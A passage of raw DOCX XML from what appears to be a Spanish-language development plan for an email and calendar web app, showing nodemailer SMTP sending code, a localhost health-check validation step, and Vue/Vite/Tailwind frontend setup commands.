          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">587</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">smtpSecure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auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> creds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        maxConnections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maxMessages</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transporters</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transporter)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transporters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(key)</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sendEmail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccountDoc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { to</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cc</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bcc</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subject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html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attachments</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transporter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getTransporter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account)</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transporter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sendMail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">displayName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      cc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      bcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      attachments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">attachments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AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">messageId</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Validación:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ejecutar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm dev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en el package</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">api</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, verificar que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://localhost:3000/health/live</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devuelve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{ "status": "ok" }</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y que la conexión a MongoDB y Redis es exitosa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="184"/>
    <w:bookmarkEnd w:id="185"/>
    <w:bookmarkStart w:id="191" w:name="fase-3-frontend-core-semanas-3-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.3 Fase 3: Frontend Core (Semanas 3-4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivos:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Interfaz de usuario funcional con layout de tres paneles, autenticación y gestión de correo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="186" w:name="vue-3-vite-tailwind-pinia"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.3.1 Vue 3 + Vite + Tailwind + Pinia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/web</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> create vite@latest . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--template</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vue-ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> add tailwindcss@^3 @tailwindcss/forms @tailwindcss/typography postcss autoprefixer</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> add pinia@^2 vue-router@^4 @vueuse/core@^12 date-fns@^4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> add tiptap@^2 @tiptap/vue-3@^2 @tiptap/starter-kit@^2 @tiptap/extension-link@^2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> add @fullcalendar/core@^6 @fullcalendar/vue3@^6 @fullcalendar/daygrid@^6 @fullcalendar/timegrid@^6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> add tsdav@^3 ical.js@^2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> @playwright/test</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Inicializar Tailwind</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">npx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tailwindcss init </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/web/src/main.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { createApp } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'vue'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { createPinia } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'pinia'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> router </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./router'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> App </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./App.vue'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./style.css'</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createApp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(App)</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createPinia</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(router)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'#app'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="186"/>
    <w:bookmarkStart w:id="187" w:name="layout-de-tres-paneles-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.3.2 Layout de Tres Paneles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
